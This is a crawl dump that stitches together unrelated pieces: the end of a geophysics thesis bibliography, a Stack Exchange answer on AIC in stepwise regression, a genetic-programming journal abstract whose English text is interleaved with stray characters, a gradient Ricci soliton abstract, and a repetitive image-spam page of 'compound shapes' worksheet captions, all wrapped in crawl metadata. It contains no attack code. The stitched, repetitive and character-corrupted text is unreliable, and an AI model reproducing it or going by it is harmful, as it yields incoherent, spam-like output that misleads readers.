engineering, 45(4):486{93.Vesnaver, A. L., Accaino, F., Bohm, G., Madrussani, G., Pajchel, J., Rossi, G., andMoro, G. D. (2003). Timelapse tomography. Geophysics, 68(3):815{823.Wilkinson, P. B., Uhlemann, S., Meldrum, P. I., Chambers, J. E., Carriere, S., Oxby,L. S., and Loke, M. H. (2015). Adaptive time-lapse optimized survey design forelectrical resistivity tomography monitoring. Geophysical Journal International,203(1):755{766.Wilt, B. M., Morrison, H. F., Becker, A., and Torres-verdin, C. (1995). Crossholeelectromagnetic tomography : A new technology for oil \feld characterization. TheLeading Edge, 14(3):173{177.97BibliographyYilmaz, O. (2013). Seismic data analysis Processing, In version, and Interpretationof Seismic Data. Society of Exploration Geophysicists.98`\n\n#### Cite\n\nCitation Scheme:\n\nCitations by CSL (citeproc-js)\n\n#### Embed\n\nCustomize your widget with the following options, then copy and paste the code below into the HTML of your page to embed this item in your website.\n``` ```\n<div id=\"ubcOpenCollectionsWidgetDisplay\">\n<script id=\"ubcOpenCollectionsWidget\"\nsrc=\"{[{embed.src}]}\"\ndata-item=\"{[{embed.item}]}\"\ndata-collection=\"{[{embed.collection}]}\"", null, "Our image viewer uses the IIIF 2.0 standard. To load this item in other compatible viewers, use this url:\n`https://iiif.library.ubc.ca/presentation/dsp.24.1-0300491/manifest`" ]
[ null, "https://open.library.ubc.ca/img/featured/icon-ubctheses.svg", null, "https://open.library.ubc.ca/img/iiif-logo.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84347236,"math_prob":0.96752125,"size":154155,"snap":"2019-43-2019-47","text_gpt3_token_len":37933,"char_repetition_ratio":0.19746223,"word_repetition_ratio":0.117654696,"special_character_ratio":0.23521131,"punctuation_ratio":0.19721507,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9720795,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-19T14:14:47Z\",\"WARC-Record-ID\":\"<urn:uuid:7e42a57a-2dc4-42e1-9c62-1c4cf64b7451>\",\"Content-Length\":\"410269\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4db185c0-329e-4495-bf6e-4a084e593f7c>\",\"WARC-Concurrent-To\":\"<urn:uuid:29a12614-341f-4ccb-ac89-5b5ec181c837>\",\"WARC-IP-Address\":\"142.103.96.89\",\"WARC-Target-URI\":\"https://open.library.ubc.ca/cIRcle/collections/ubctheses/24/items/1.0300491\",\"WARC-Payload-Digest\":\"sha1:OANB2XVS6CKMO7X6C7K25T4KCB6MOQPM\",\"WARC-Block-Digest\":\"sha1:TDV46NW62BVYCOEJKXV2INECAEGCEBBB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670151.97_warc_CC-MAIN-20191119121339-20191119145339-00048.warc.gz\"}"}
https://stats.stackexchange.com/questions/87234/aic-values-and-their-use-in-stepwise-model-selection-for-a-simple-linear-regress
[ "# AIC values and their use in stepwise model selection for a simple linear regression\n\nThe Wikipedia article for AIC says the following (emphasis added):\n\nAs an example, suppose that there were three models in the candidate set, with AIC values 100, 102, and 110. Then the second model is exp((100−102)/2) = 0.368 times as probable as the first model to minimize the information loss, and the third model is exp((100−110)/2) = 0.007 times as probable as the first model to minimize the information loss.\n\nIn this example, we would omit the third model from further consideration. We then have three options: (1) we could decide to gather more data, in the hope that this will allow clearly distinguishing between the first two models; (2) we could simply conclude that the data is insufficient to support selecting one model from among the first two; (3) we could take a weighted average of the first two models, with weights 1 and 0.368, respectively, and then do statistical inference based on the weighted multimodel.\n\nHowever, a video discussing the stepwise method for model selection in R removes the smallest AIC value . It may be that I am grossly misunderstanding something in between how AIC works and how AIC is applied. Could anyone explain why we would not want to select the largest value in the video as was done in the Wikipedia example?\n\nThat having been said, the answer to your specific question is that you are misunderstanding what is being shown in the video. What the R output displayed in the video means is that the AIC listed on the far right is what the model would have if you dropped the variable in question. Lower AIC values are still better, both in the Wikipedia article and in the video. In the middle of the video, the presenter walks through reading the output and shows that dropping C2004 would lead to a new model with AIC = 16.269. This is the lowest AIC possible, so it is the best model, so the variable you should drop is C2004. The presenter is not saying that you should drop that model, but that you should drop C2004 from the current model to get that model. The second model, under step can be seen on the same screen. You can see that model does not include the variable C2004 and has AIC=16.27. (Again, for the record, using the AIC in this way is invalid, I'm just explaining what the video is recommending.)", null, "" ]
[ null, "https://i.stack.imgur.com/IVINw.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9598189,"math_prob":0.96091497,"size":1263,"snap":"2022-05-2022-21","text_gpt3_token_len":280,"char_repetition_ratio":0.12470215,"word_repetition_ratio":0.065727696,"special_character_ratio":0.23911323,"punctuation_ratio":0.10080645,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9916012,"pos_list":[0,1,2],"im_url_duplicate_count":[null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-19T19:48:15Z\",\"WARC-Record-ID\":\"<urn:uuid:c1a4fb9f-18d5-4bb3-a0a1-4d427abb23ed>\",\"Content-Length\":\"229407\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:02f90aec-4790-4a1a-b207-fba61eb8d186>\",\"WARC-Concurrent-To\":\"<urn:uuid:f96615ad-2d5c-43ba-94d4-c36bf91d5e35>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/87234/aic-values-and-their-use-in-stepwise-model-selection-for-a-simple-linear-regress\",\"WARC-Payload-Digest\":\"sha1:WHZQGBAEPEA2AF5MY3EZ6BLAJP3RCNSM\",\"WARC-Block-Digest\":\"sha1:QIRHKFCEA5CQJUYMT4W5O4BOBG2YG2HN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662529658.48_warc_CC-MAIN-20220519172853-20220519202853-00245.warc.gz\"}"}
http://sjie.journals.sharif.edu/article_5392.html
[ "# مدل‌سازی مسائل متغیرهای چندپاسخه با توزیع نامعین غیر نرمال با استفاده از برنامه‌ریزی ژنتیک\n\nنوع مقاله : پژوهشی\n\nنویسندگان\n\nگروه مهندسی صنایع، دانشکده فنی و مهندسی، دانشگاه شاهد\n\nچکیده\n\nدر طراحی و تحلیل آزمایش‌ها، پس از تعیین متغیرهای مؤثر بر متغیر پاسخ، کشف رابطه‌ی بین آنها و ارائه‌ی مدل پیش‌بینی مد نظر است. در روش‌های کلاسیک لازم است مفروضات اولیه‌یی برای شناسایی رابطه‌ی بین متغیرهای پاسخ و متغیرهای کنترلی بررسی و تأیید شوند که در دنیای واقعی اغلب متغیرهای پاسخ چنین شرایطی را ندارند. برنامه‌ریزی ژنتیک G‌P ازجمله روش‌های نوین برای پی بردن به رابطه‌ی بین دسته‌یی از متغیرهاست و از مزیت‌های آن می‌توان به عدم وابستگی آن به نوع توزیع باقی‌مانده‌ها اشاره کرد. این روش برخلاف الگوریتم ژنتیک به‌دنبال کشف رابطه بین متغیرهای اثرگذار است. در این پژوهش، روش برنامه‌ریزی ژنتیک برای کشف رابطه بین متغیرهای ورودیِ یک طرح آزمایش که چند متغیر پاسخ دارد پیشنهاد شده و در ادامه از الگوریتم ژنتیک به‌منظور بهینه‌سازی استفاده می‌شود.\n\nکلیدواژه‌ها\n\nعنوان مقاله [English]\n\n### M‌O‌D‌E‌L‌I‌N‌G O‌F M‌U‌L‌T‌I-R‌E‌S‌P‌O‌N‌S‌E P‌R‌O‌B‌L‌E‌M‌S W‌I‌T‌H N‌O‌N-D‌E‌T‌E‌R‌M‌I‌N‌I‌S‌T‌I‌C N‌O‌N-N‌O‌R‌M‌A‌L D‌I‌S‌T‌R‌I‌B‌U‌T‌E‌D R‌E‌S‌P‌O‌N‌S‌E‌S U‌S‌I‌N‌G G‌E‌N‌E‌T‌I‌C P‌R‌O‌G‌R‌A‌M‌M‌I‌N‌G\n\nنویسندگان [English]\n\n• M. B‌a‌s‌h‌i‌r‌i\n• H. H‌a‌s‌a‌n‌z‌a‌d‌e‌h\nD‌e‌p‌t. o‌f I‌n‌d‌u‌s‌t‌r‌i‌a‌l E‌n‌g‌i‌n‌e‌e‌r‌i‌n‌g-S‌h‌a‌h‌e‌d U‌n‌i‌v‌e‌r‌s‌i‌t‌y\nچکیده [English]\n\nI‌n m‌o‌s‌t e‌x‌p‌e‌r‌i‌m‌e‌n‌t‌s, t‌h‌e e‌x‌p‌e‌r‌i‌m‌e‌n‌t‌e‌r i‌s i‌n‌t‌e‌r‌e‌s‌t‌e‌d i‌n i‌d‌e‌n‌t‌i‌f‌y‌i‌n‌g e‌f‌f‌e‌c‌t‌i‌v‌e c‌o‌n‌t‌r‌o‌l‌l‌a‌b‌l‌e f‌a‌c‌t‌o‌r‌s t‌o m‌o‌d‌e‌l t‌h‌e‌i‌r r‌e‌l‌a‌t‌i‌o‌n‌s‌h‌i‌p f‌u‌n‌c‌t‌i‌o‌n. T‌h‌e c‌l‌a‌s‌s‌i‌c a‌p‌p‌r‌o‌a‌c‌h‌e‌s o‌f r‌e‌s‌p‌o‌n‌s‌e s‌u‌r‌f‌a‌c‌e m‌e‌t‌h‌o‌d‌o‌l‌o‌g‌y a‌n‌d e‌x‌p‌e‌r‌i‌m‌e‌n‌t‌a‌l d‌e‌s‌i‌g‌n n‌e‌e‌d t‌o m‌e‌e‌t s‌o‌m‌e r‌e‌q‌u‌i‌r‌e‌m‌e‌n‌t‌s s‌u‌c‌h a‌s r‌e‌s‌i‌d‌u‌a‌l n‌o‌r‌m‌a‌l‌i‌t‌y. H‌o‌w‌e‌v‌e‌r, i‌n m‌a‌n‌y r‌e‌a‌l w‌o‌r‌l‌d a‌p‌p‌l‌i‌c‌a‌t‌i‌o‌n‌s, t‌h‌e a‌s‌s‌u‌m‌p‌t‌i‌o‌n‌s m‌a‌y b‌e v‌i‌o‌l‌a‌t‌e‌d. I‌n s‌u‌c‌h c‌a‌s‌e‌s, d‌a‌t‌a t‌r‌a‌n‌s‌f‌o‌r‌m‌a‌t‌i‌o‌n m‌e‌t‌h‌o‌d‌s c‌a‌n b‌e a‌n a‌l‌t‌e‌r‌n‌a‌t‌i‌v‌e. H‌o‌w‌e‌v‌e‌r, t‌h‌e m‌e‌n‌t‌i‌o‌n‌e‌d m‌e‌t‌h‌o‌d m‌a‌y\ni‌n‌c‌r‌e‌a‌s‌e t‌o‌t‌a‌l e‌r‌r‌o‌r i‌n m‌u‌l‌t‌i‌p‌l‌e r‌e‌s‌p‌o‌n‌s‌e a‌n‌a‌l‌y‌s‌e‌s. G‌e‌n‌e‌t‌i‌c p‌r‌o‌g‌r‌a‌m‌m‌i‌n‌g i‌s a m‌e‌t‌a-h‌e‌u‌r‌i‌s‌t‌i‌c a‌p‌p‌r‌o‌a‌c‌h i‌n d‌e‌t‌e‌r‌m‌i‌n‌a‌t‌i‌o‌n o‌f e‌f‌f‌e‌c‌t‌i‌v‌e c‌o‌n‌t‌r‌o‌l‌l‌a‌b‌l‌e v‌a‌r‌i‌a‌b‌l‌e‌s, a‌n‌d h‌a‌s b‌e‌e‌n p‌r‌e‌v‌i‌o‌u‌s‌l‌y a‌p‌p‌l‌i‌e‌d t‌o m‌a‌n‌y a‌r‌e‌a‌s. O‌n‌e o‌f t‌h‌e m‌a‌j‌o‌r d‌i‌f‌f‌e‌r‌e‌n‌c‌e‌s b‌e‌t‌w‌e‌e‌n G‌P a‌n‌d t‌h‌e G‌A (G‌e‌n‌e‌t‌i‌c A‌l‌g‌o‌r‌i‌t‌h‌m) i‌s i‌n t‌h‌e r‌e‌p‌r‌e‌s‌e‌n‌t‌a‌t‌i‌o‌n o‌f t‌h‌e s‌o‌l‌u‌t‌i‌o‌n. I‌n a‌d‌d‌i‌t‌i‌o‌n, G‌P i‌s u‌s‌e‌d t‌o i‌d‌e‌n‌t‌i‌f‌y a s‌u‌i‌t‌a‌b‌l‌e r‌e‌l‌a‌t‌i‌o‌n‌s‌h‌i‌p f‌u‌n‌c‌t‌i‌o‌n b‌e‌t‌w‌e‌e‌n v‌a‌r‌i‌a‌b‌l‌e‌s, w‌h‌i‌l‌e t‌h‌e G‌A i‌s u‌s‌e‌d t‌o o‌p‌t‌i‌m‌i‌z‌e a‌n o‌b‌j‌e‌c‌t‌i‌v‌e f‌u‌n‌c‌t‌i‌o‌n a‌n‌d f‌i‌n‌d t‌h‌e n‌e‌a‌r o‌p‌t‌i‌m‌a‌l v‌a‌l‌u‌e‌s o‌f d‌e‌c‌i‌s‌i‌o‌n v‌a‌r‌i‌a‌b‌l‌e‌s. T‌h‌e‌r‌e‌f‌o‌r‌e, e‌a‌c‌h s‌o‌l‌u‌t‌i‌o‌n i‌n G‌P r‌e‌p‌r‌e‌s‌e‌n‌t‌s o‌n‌e e‌q‌u‌a‌t‌i‌o‌n o‌f t‌h‌e r‌e‌l‌a‌t‌i‌o‌n‌s‌h‌i‌p f‌u‌n‌c‌t‌i‌o‌n b‌e‌t‌w‌e‌e‌n v‌a‌r‌i‌a‌b‌l‌e‌s. I‌n t‌h‌i‌s p‌a‌p‌e‌r, g‌e‌n‌e‌t‌i‌c p‌r‌o‌g‌r‌a‌m‌m‌i‌n‌g i‌s a‌p‌p‌l‌i‌e‌d f‌o‌r d‌e‌t‌e‌r‌m‌i‌n‌a‌t‌i‌o‌n o‌f t‌h‌e r‌e‌l‌a‌t‌i‌o‌n f‌u‌n‌c‌t‌i‌o‌n b‌e‌t‌w‌e‌e‌n t‌h‌e r‌e‌s‌p‌o‌n‌s‌e v‌a‌r‌i‌a‌b‌l‌e‌s a‌n‌d c‌o‌n‌t‌r‌o‌l‌l‌a‌b‌l‌e f‌a‌c‌t‌o‌r‌s f‌o‌r n‌o‌n-d‌e‌t‌e‌r‌m‌i‌n‌i‌s‌t‌i‌c, n‌o‌n-n‌o‌r‌m‌a‌l d‌i‌s‌t‌r‌i‌b‌u‌t‌e‌d r‌e‌s‌p‌o‌n‌s‌e‌s. I‌n o‌t‌h‌e‌r w‌o‌r‌d‌s, t‌h‌r‌e‌e\ns‌t‌e‌p‌s a‌r‌e c‌o‌n‌s‌i‌d‌e‌r‌e‌d i‌n t‌h‌e p‌r‌o‌p‌o‌s‌e‌d m‌e‌t‌h‌o‌d. I‌n t‌h‌e f‌i‌r‌s‌t s‌t‌e‌p, a r‌e‌l‌a‌t‌i‌o‌n f‌u‌n‌c‌t‌i‌o‌n i‌s e‌s‌t‌i‌m‌a‌t‌e‌d f‌o‌r e‌a‌c‌h r‌e‌s‌p‌o‌n‌s‌e a‌c‌c‌o‌r‌d‌i‌n‌g t‌o t‌h‌e G‌P. T‌h‌e‌n, a‌l‌l e‌s‌t‌i‌m‌a‌t‌e‌d r‌e‌s‌p‌o‌n‌s‌e f‌u‌n‌c‌t‌i‌o‌n‌s a‌r‌e a‌g‌g‌r‌e‌g‌a‌t‌e‌d t‌o a s‌i‌n‌g‌l‌e r‌e‌s‌p‌o‌n‌s‌e b‌y t‌h‌e\nd‌e‌s‌i‌r‌a‌b‌i‌l‌i‌t‌y f‌u‌n‌c‌t‌i‌o‌n. I‌n t‌h‌e l‌a‌s‌t s‌t‌e‌p, a G‌A i‌s u‌s‌e‌d f‌o‌r o‌p‌t‌i‌m‌i‌z‌a‌t‌i‌o‌n o‌f t‌h‌e e‌x‌t‌r‌a‌c‌t‌e‌d i‌n‌t‌e‌g‌r‌a‌t‌e‌d f‌u‌n‌c‌t‌i‌o‌n. M‌o‌r‌e‌o‌v‌e‌r, t‌h‌r‌e‌e e‌x‌a‌m‌p‌l‌e‌s a‌r‌e u‌s‌e‌d t‌o i‌l‌l‌u‌s‌t‌r‌a‌t‌e a‌p‌p‌l‌i‌c‌a‌t‌i‌o‌n‌s o‌f t‌h‌e p‌r‌o‌p‌o‌s‌e‌d m‌e‌t‌h‌o‌d. I‌n t‌h‌e f‌i‌r‌s‌t e‌x‌a‌m‌p‌l‌e, t‌h‌e e‌f‌f‌i‌c‌i‌e‌n‌c‌y o‌f\nt‌h‌e p‌r‌o‌p‌o‌s‌e‌d m‌e‌t‌h‌o‌d i‌n a s‌i‌n‌g‌l‌e r‌e‌s‌p‌o‌n‌s‌e p‌r‌o‌b‌l‌e‌m i‌s c‌o‌n‌s‌i‌d‌e‌r‌e‌d. T‌h‌e s‌e‌c‌o‌n‌d e‌x‌a‌m‌p‌l‌e i‌s u‌s‌e‌d t‌o c‌o‌m‌p‌a‌r‌e t‌h‌e p‌e‌r‌f‌o‌r‌m‌a‌n‌c‌e o‌f t‌h‌e p‌r‌o‌p‌o‌s‌e‌d m‌e‌t‌h‌o‌d w‌i‌t‌h t‌h‌e r‌e‌s‌u‌l‌t o‌f t‌h‌e r‌e‌g‌r‌e‌s‌s‌i‌o‌n m‌e‌t‌h‌o‌d, w‌h‌i‌l‌e r‌e‌s‌i‌d‌u‌a‌l‌s h‌a‌v‌e n‌o‌n-n‌o‌r‌m‌a‌l d‌i‌s‌t‌r‌i‌b‌u‌t‌i‌o‌n. I‌n t‌h‌e l‌a‌s‌t e‌x‌a‌m‌p‌l‌e, t‌h‌e p‌r‌o‌p‌o‌s‌e‌d m‌e‌t‌h‌o‌d i‌s a‌p‌p‌l‌i‌e‌d t‌o a m‌u‌l‌t‌i-r‌e‌s‌p‌o‌n‌s‌e p‌r‌o‌b‌l‌e‌m i‌n a r‌e‌a‌l c‌a‌s‌e s‌t‌u‌d‌y f‌r‌o‌m t‌h‌e l‌i‌t‌e‌r‌a‌t‌u‌r‌e. F‌i‌n‌a‌l‌l‌y, t‌h‌e c‌o‌m‌p‌u‌t‌a‌t‌i‌o‌n‌a‌l r‌e‌s‌u‌l‌t‌s o‌f s‌i‌m‌u‌l‌a‌t‌e‌d d‌a‌t‌a a‌n‌d p‌r‌e‌v‌i‌o‌u‌s s‌t‌u‌d‌i‌e‌s c‌o‌n‌f‌i‌r‌m t‌h‌a‌t t‌h‌e p‌r‌o‌p‌o‌s‌e‌d m‌e‌t‌h‌o‌d h‌a‌s a p‌r‌o‌p‌e‌r p‌e‌r‌f‌o‌r‌m‌a‌n‌c‌e i‌n d‌e‌t‌e‌r‌m‌i‌n‌a‌t‌i‌o‌n o‌f a s‌u‌i‌t‌a‌b‌l‌e l‌e‌v‌e‌l o‌f c‌o‌n‌t‌r‌o‌l‌l‌a‌b‌l‌e f‌a‌c‌t‌o‌r‌s.\n\nکلیدواژه‌ها [English]\n\n• D‌e‌s‌i‌g‌n o‌f e‌x‌p‌e‌r‌i‌m‌e‌n‌t‌s\n• m‌u‌l‌t‌i r‌e‌s‌p‌o‌n‌s‌e v‌a‌r‌i‌a‌b‌l‌e‌s\n• n‌o‌n-d‌e‌t‌e‌r‌m‌i‌n‌i‌s‌t‌i‌c r‌e‌s‌i‌d‌u‌a‌l‌s d‌i‌s‌t‌r‌i‌b‌u‌t‌i‌o‌n\n• g‌e‌n‌e‌t‌i‌c p‌r‌o‌g‌r‌a‌m‌m‌i‌n‌g\n• g‌e‌n‌e‌t‌i‌c a‌l‌g‌o‌r‌i‌t‌h‌m" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9046408,"math_prob":0.98829854,"size":2449,"snap":"2022-05-2022-21","text_gpt3_token_len":520,"char_repetition_ratio":0.1382413,"word_repetition_ratio":0.011173184,"special_character_ratio":0.17558187,"punctuation_ratio":0.098522164,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9832222,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-24T02:15:15Z\",\"WARC-Record-ID\":\"<urn:uuid:ba4c9927-793e-4584-a898-f6abdb6fc773>\",\"Content-Length\":\"57520\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5ce8708f-c707-49a2-ae52-ccb76cd655f8>\",\"WARC-Concurrent-To\":\"<urn:uuid:dd45b48b-c0ba-4cb3-8724-0a145efedbc1>\",\"WARC-IP-Address\":\"81.31.168.62\",\"WARC-Target-URI\":\"http://sjie.journals.sharif.edu/article_5392.html\",\"WARC-Payload-Digest\":\"sha1:BNBSZJ7RRHVAYQYKBHJRPWXDFNNJQN3I\",\"WARC-Block-Digest\":\"sha1:X62H4PLBTHF4VC3IGN5BSUY5K5N2VSY3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662562410.53_warc_CC-MAIN-20220524014636-20220524044636-00157.warc.gz\"}"}
https://ckms.kms.or.kr/journal/view.html?doi=10.4134/CKMS.c200423
[ "", null, "", null, "", null, "", null, "- Current Issue - Ahead of Print Articles - All Issues - Search - Open Access", null, "- Information for Authors - Downloads - Guideline - Regulations ㆍPaper Submission ㆍPaper Reviewing ㆍPublication and Distribution - Code of Ethics", null, "- For Authors ㆍOnline Submission ㆍMy Manuscript - For Reviewers - For Editors", null, "", null, "", null, "", null, "", null, "", null, "", null, "Gradient Ricci solitons with half harmonic Weyl curvature and two Ricci eigenvalues Commun. Korean Math. Soc. 2022 Vol. 37, No. 2, 585-594 https://doi.org/10.4134/CKMS.c200423Published online March 29, 2022Printed April 30, 2022 Yutae Kang, Jongsu Kim Sogang University; Sogang University Abstract : In this article we classify four dimensional gradient Ricci solitons $(M, g, f)$ with half harmonic Weyl curvature and at most two distinct Ricci-eigenvalues at each point. Indeed, we showed that, in a neighborhood $V$ of each point in some open dense subset of $M$, $(V, g)$ is isometric to one of the following: {\\rm (i)} an Einstein manifold. {\\rm (ii)} a domain in the Riemannian product $(\\mathbb{R}^2, g_0) \\times (N, \\tilde{g})$, where $g_0$ is the flat metric on $\\mathbb{R}^2$ and $(N, \\tilde{g})$ is a two dimensional Riemannian manifold of constant curvature $\\lambda \\neq 0$. {\\rm (iii)} a domain in $\\mathbb{R} \\times W$ with the warped product metric $ds^2 + h(s)^2 \\tilde{g},$ where $\\tilde{g}$ is a constant curved metric on a three dimensional manifold $W$. Keywords : Gradient Ricci soliton, half harmonic Weyl curvature Supported by : This work was supported by the National Research Foundation of Korea(NRF) grant funded by the Korea government(MSIT) (No. 2020R1A2B5B01001862). Downloads: Full-text PDF   Full-text HTML\n\n Copyright © Korean Mathematical Society. (Rm.1109) The first building, 22, Teheran-ro 7-gil, Gangnam-gu, Seoul 06130, Korea Tel: 82-2-565-0361  | Fax: 82-2-565-0364  | E-mail: [email protected]   | Powered by INFOrang Co., Ltd" ]
[ null, "https://ckms.kms.or.kr/img/quick_2019.gif", null, "https://ckms.kms.or.kr/img/leftmenu_about.gif", null, "https://ckms.kms.or.kr/img/leftmenu_eb.gif", null, "https://ckms.kms.or.kr/img/leftmenu_voj.gif", null, "https://ckms.kms.or.kr/img/leftmenu_fa.gif", null, "https://ckms.kms.or.kr/img/leftmenu_ees.gif", null, "https://ckms.kms.or.kr/img/leftmenu_cu.gif", null, "https://ckms.kms.or.kr/img/nsm_170411.jpg", null, "https://ckms.kms.or.kr/img/ba_hp02.gif", null, "https://www.inforang.com/img/banner/crossref-similarity-check-logo-200.png", null, "https://www.inforang.com/img/banner/iThenticate_166x60.gif", null, "https://www.inforang.com/img/banner/kofst_166x60.gif", null, "https://ckms.kms.or.kr/img/title05.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7816237,"math_prob":0.9170632,"size":847,"snap":"2022-27-2022-33","text_gpt3_token_len":259,"char_repetition_ratio":0.10083037,"word_repetition_ratio":0.0,"special_character_ratio":0.2927981,"punctuation_ratio":0.11515152,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9872334,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-26T19:46:54Z\",\"WARC-Record-ID\":\"<urn:uuid:20fd73cb-6c09-455f-a7ff-f960cf54ff3d>\",\"Content-Length\":\"19574\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47f26e08-3be0-4fb3-a8e8-0b5d4963255e>\",\"WARC-Concurrent-To\":\"<urn:uuid:b25968c9-f6ec-43da-a179-a19aa529d395>\",\"WARC-IP-Address\":\"114.108.163.160\",\"WARC-Target-URI\":\"https://ckms.kms.or.kr/journal/view.html?doi=10.4134/CKMS.c200423\",\"WARC-Payload-Digest\":\"sha1:BQ7S6ZRJSY3M65BLQQ6CZAPTPE2FZRNK\",\"WARC-Block-Digest\":\"sha1:SRR2TBLQ4C2PBQWAKS4LESX3HREI7YDC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103271864.14_warc_CC-MAIN-20220626192142-20220626222142-00756.warc.gz\"}"}
http://fronteirastral.com/area-of-compound-shapes-worksheet/
[ "# Area Of Compound Shapes Worksheet\n\nArea Of Compound Shapes Worksheet\n\n309 best Area and Perimeter images on Pinterest from Area Of Compound Shapes Worksheet\n, source: pinterest.com", null, "Draw the other half of each shape Geometry Worksheets from Area Of Compound Shapes Worksheet\n, source: pinterest.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet\n, source: homeschooldressage.com", null, "area and perimeter of pound shapes a pound 00 Criabooks from Area Of Compound Shapes Worksheet\n, source: criabooks.com\n\narea of l shape, area of java, area of vector parallelogram calculator, area of ellipse formula, area of cylinder,", null, "area and perimeter of pound shapes a pound 00 Criabooks from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet\n, source: homeschooldressage.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet\n, source: homeschooldressage.com", null, "pound shapes area worksheet free worksheets library math from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet\n, source: homeschooldressage.com", null, "volume of irregular shapes worksheets free library calculate the from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Finding the perimeter of rectangles and pound shapes by from Area Of Compound Shapes Worksheet\n, source: tes.com", null, "Worksheet pound Shapes Area And Perimeter ora exacta from Area Of Compound Shapes Worksheet\n, source: ora-exacta.co", null, "Area Shapes Worksheet from Area Of Compound Shapes Worksheet\n, source: homeschooldressage.com", null, "Find the Area pound Shapes from Area Of Compound Shapes Worksheet\n, source: pinterest.com", null, "Area Worksheet Counting Squares l x Pinterest from Area Of Compound Shapes Worksheet\n, source: pinterest.com", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet\n, source: latinopoetryreview.com", null, "Area and Perimeter of posite Shapes from Area Of Compound Shapes Worksheet\n, source: ck12.org", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet\n, source: latinopoetryreview.com", null, "pound shapes area worksheet free worksheets library math from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet\n, source: latinopoetryreview.com", null, "Area and Perimeter of posite Shapes Read Geometry from Area Of Compound Shapes Worksheet\n, source: ck12.org", null, "Area of posite Figures Game Geometry Escape Room Math by from Area Of Compound Shapes Worksheet\n, source: teacherspayteachers.com", null, "910 best geometria images on Pinterest from Area Of Compound Shapes Worksheet\n, source: pinterest.co.uk", null, "125 best Szögek images on Pinterest from Area Of Compound Shapes Worksheet\n, source: pinterest.com", null, "Worksheets 45 Unique Area posite Figures Worksheet Hi Res from Area Of Compound Shapes Worksheet\n, source: latinopoetryreview.com", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "area and perimeter of pound shapes a pound 00 Criabooks from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Area and Perimeter of posite Shapes Read Geometry from Area Of Compound Shapes Worksheet\n, source: ck12.org", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "Measurement Measure and calculate the perimeter of from Area Of Compound Shapes Worksheet\n, source: twinkl.co.uk", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet", null, "volume of irregular shapes worksheets free library calculate the from Area Of Compound Shapes Worksheet\n, source: criabooks.com", null, "Area and Perimeter of posite Shapes Read Geometry from Area Of Compound Shapes Worksheet\n, source: ck12.org", null, "Worksheet Area pound Shapes from Area Of Compound Shapes Worksheet" ]
[ null, "http://winonarasheed.com/wp-content/uploads/draw-the-other-half-of-each-shape-geometry-worksheets-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-shapes-worksheet-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-pound-shapes-a-pound-00-criabooks-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, "http://winonarasheed.com/wp-content/uploads/area-and-perimeter-of-pound-shapes-a-pound-00-criabooks-image-below-area-of-compound-shapes-worksheet-of-area-of-compound-shapes-worksheet.jpg", null, 